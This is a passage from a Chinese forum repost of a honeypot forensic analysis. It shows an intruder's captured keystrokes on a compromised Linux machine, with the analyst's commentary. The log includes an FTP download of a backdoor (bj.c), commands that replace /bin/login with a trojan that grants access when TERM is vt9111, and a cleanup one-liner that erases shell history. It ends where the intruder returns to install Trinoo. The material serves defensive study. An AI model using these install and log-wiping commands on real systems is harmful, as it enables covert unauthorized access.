了解你的敌人：一次入侵过程的公开分析.txt

BBS的精华之处

Password: Password: hax0r 
下面，我们的黑客朋友使用ftp连接到另外一个系统上去获取她的工具包。 
[root@apollo /]# ftp 24.112.167.35 
Connected to 24.112.167.35. 
220 linux FTP server(Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready 
  
.. 
Name (24.112.167.35:twin): welek 
331 Password required for welek. 
Password:password 
230 User welek logged in. 
Remote system type is UNIX. 
Using binary mode to transfer files. 
ftp> get bj.c 
local: bj.c remote: bj.c 
200 PORT command successful. 
150 Opening BINARY mode data connection for bj.c (1010 bytes). 
226 Transfer complete. 
1010 bytes received in 0.115 secs (8.6 Kbytes/sec) 
ftp> quit 
221-You have transferred 1010 bytes in 1 files. 
221-Total traffic for this session was 1421 bytes in 1 transfers. 
221-Thank you for using the FTP service on linux. 
221 Goodbye. 
然后，她得到她的后门程序，编译了bj.c，把它安装和替换掉/sbin/login程序。注意所 
  
有的在命令行方式下输入的命令。看上去这些编译命令都是通过“拷贝和粘贴”操作来 
  
完成的。 
[root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod 
u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old rm /bin/logi 
  
nchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cg 
  
cc -o login bj.c 
bj.c:16: unterminated string or character constant 
bj.c:12: possible real start of unterminated constant 
她试图来编译这个后门程序。 
[root@apollo /]# chown root:bin login 
chown: login: No such file or directory 
[root@apollo /]# chmod 4555 login 
chmod: login: No such file or directory 
[root@apollo /]# chmod u-w login 
chmod: login: No such file or directory 
[root@apollo /]# cp /bin/login /usr/bin/xstat 
[root@apollo /]# cp /bin/login /usr/bin/old 
[root@apollo /]# rm /bin/login 
[root@apollo /]# chmod 555 /usr/bin/xstat 
[root@apollo /]# chgrp in /usr/bin/xstat 
[root@apollo /]# mv login /bin/login 
mv: login: No such file or directory 
[root@apollo /]# rm bj.c 
呵呵！但是她显然不能够让这个编译过程正确完成，所以她又重新尝试了一次。她重新 
  
连接到ftp站点去下载后门程序。 
[root@apollo /]# ftp 24.112.167.35 
Connected to 24.112.167.35. 
220 linux FTP server(Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready 
  
.. 
Name (24.112.167.35:twin): 
[root@apollo /]# ftp 24.112.167.35 
Connected to 24.112.167.35. 
220 linux FTP server(Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready 
  
.. 
Name (24.112.167.35:twin): welek 
331 Password required for welek. 
Password:331 Password required for welek. 
Password:password 
230 User welek logged in. 
Remote system type is UNIX. 
Using binary mode to transfer files. 
ftp> get bj.c 
qulocal: bj.c remote: bj.c 
200 PORT command successful. 
u150 Opening BINARY mode data connection for bj.c (1011 bytes). 
226 Transfer complete. 
1011 bytes received in 0.134 secs (7.3 Kbytes/sec) 
ftp> itit 
221-You have transferred 1011 bytes in 1 files. 
221-Total traffic for this session was 1422 bytes in 1 transfers. 
221-Thank you for using the FTP service on linux. 
221 Goodbye. 
这是她第二次试图编译她的后门程序。注意她还是使用了“拷贝和粘贴”方法。 
[root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod 
u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old rm /bin/logi 
  
nchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cg 
  
cc -o login bj.c 
bj.c: In function `owned': 
bj.c:16: warning: assignment makes pointer from integer without a cast 
现在我们看到这次编译成功了。将原来的/bin/login拷贝到/usr/bin/xstat，然后使用 
  
编译过的木马程序bj.c 
替换掉了/bin/login程序。这是一个后门。这个木马允许任何人只要使用vt9111的TERM 
  
就能够越权访问系统。 
[root@apollo /]# chown root:bin login 
[root@apollo /]# chmod 4555 login 
[root@apollo /]# chmod u-w login 
[root@apollo /]# cp /bin/login /usr/bin/xstat 
cp: /bin/login: No such file or directory 
[root@apollo /]# cp /bin/login /usr/bin/old 
cp: /bin/login: No such file or directory 
[root@apollo /]# rm /bin/login 
rm: cannot remove `/bin/login': No such file or directory 
[root@apollo /]# chmod 555 /usr/bin/xstat 
[root@apollo /]# chgrp bin /usr/bin/xstat 
[root@apollo /]# mv login /bin/login 
现在她要掩盖她的所作所为。我相信她是在执行的一个脚本，并且使用“拷贝和粘贴” 
  
其中的代码。请注意她执行的所有命令都是在同一行上。同样，我相信这是一个“通用 
  
”的清扫脚本，因为我们注意到她甚至要删除一个不存在的文件 (例如/tmp/h). 
[root@apollo /]# rm bj.c 
[root@apollo /]# 
[root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/po 
  
rtmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/ 
  
..bash_hertory ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep 
  
portmap ; rm /sbin/por 359 ? 00:00:00 inetd 
359 ? 00:00:00 inetd 
rm: cannot remove `/tmp/h': No such file or directory 
rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
[root@apollo /]# ps -aux | grep portmap 
[root@apollo /]# 
[root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/po 
  
rtmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/ 
  
..bash_hertory ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep 
  
portmap ; rm /sbin/por 359 ? 00:00:00 inetd 
rm: cannot remove `/sbin/portmap': No such file or directory 
rm: cannot remove `/tmp/h': No such file or directory 
rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
[root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or director 
  
y 
我注意到一件有趣的事。我们的黑客通用清扫程序在执行过程中存在错误，因为它试图 
  
要删除那些不存在的文件。我相信我们的黑客朋友一定看到了这些错误并且关心这件事 
  
情，因为她接着试图手工删除这些同样的文件，虽然这些文件并不存在。 
rm: cannot remove `/tmp/h': No such file or directory 
rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
[root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or director 
  
y 
rm: cannot remove `/tmp/h': No such file or directory 
rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
[root@apollo /]# exit 
exit 
[twin@apollo /]$ exit 
logout 
好了，我们的黑客朋友已经安装了后门：bj.c。这个后门可以让将TERM设置成VT9111的 
  
用户越权访问系统。一旦她完成了这些过程后，她就退出了系统。 
回来安装Trinoo　　当我的系统被攻陷之后，我让它离线（断开网络），然后检查了数 
  
据（使用Tripwire）。然后，我注意到在一个礼拜后又出现大量的连接试图登录系统， 
  
显然那个黑客试图回来，象其他被攻陷的系统一样，她也许会使用这个系统进行更加邪 
  
恶的攻击。所以，我决定让这个被攻陷的系统重新连入网络，我想看看这个黑客想回来 
  
做什么？果然不出我所料，两个礼拜后，她又回来了。再一次的，我们使用snort捕获到 

  
她所有的键盘输入。 
  
  
-- 
☆☆